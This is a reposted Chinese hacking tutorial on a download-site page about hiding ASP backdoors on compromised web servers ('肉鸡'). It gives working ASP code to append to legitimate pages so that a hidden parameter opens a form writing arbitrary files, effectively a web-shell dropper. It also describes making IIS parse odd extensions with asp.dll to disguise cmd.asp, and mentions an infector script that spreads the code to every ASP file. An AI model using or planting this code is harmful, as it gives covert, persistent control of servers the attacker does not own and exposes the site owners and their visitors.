Win10下载站 - 最全面的操作系统下载网站

软件教程软件下载seo常用PPT下载

windows7旗舰版
当前位置:主页 > 网络技术教程 >

ASP后门的放置办法

发布时间:2024-01-08 来源:win7旗舰版 浏览量:

网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。

传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。
一种是aspInjection(好像这个词真流行呀)。先看第一个图。

这是一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。
再看第二个图,

看一下,用了http://xxx/admin.asp?id=1就多出一个东东来了,第二个图下面这个框,你可以用它来生成网页木马,可以生成asp/php/cgi等网页后门。怎么做到的呢?只要你将这段代码插入某个asp网页代码最下端即可。

<%
onerrorresumenext
id=request("id")
ifrequest("id")=1then
testfile=Request.form("name")
msg=Request.form("message")
setfs=server.CreateObject("scripting.filesystemobject")
setthisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
setfs=nothing
%>
<formmethod="POST"ACTION="你要插入的asp文件名?id=1">
<inputtype="text"size="20"name="Name"

value=<%=server.mappath("xp.asp")%>>
<textareaname="Message"class=input>
   </textarea>
<inputtype="submit"name="Send"value="生成"class=input>
  </form>
<%endif%>


值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有<!--#includefile="conn.asp"-->这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。
版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)

第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,
我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?

一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。

网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。

关键词: ASP后门的放置办法 
我要分享:

相关推荐

本站发布的ghost系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版软件!

如侵犯到您的权益,请及时通知我们,我们会及时处理。 手机站

Copyright @ 2018 win10下载站(http://www.win1064.cn) 版权所有  xml地图 邮箱: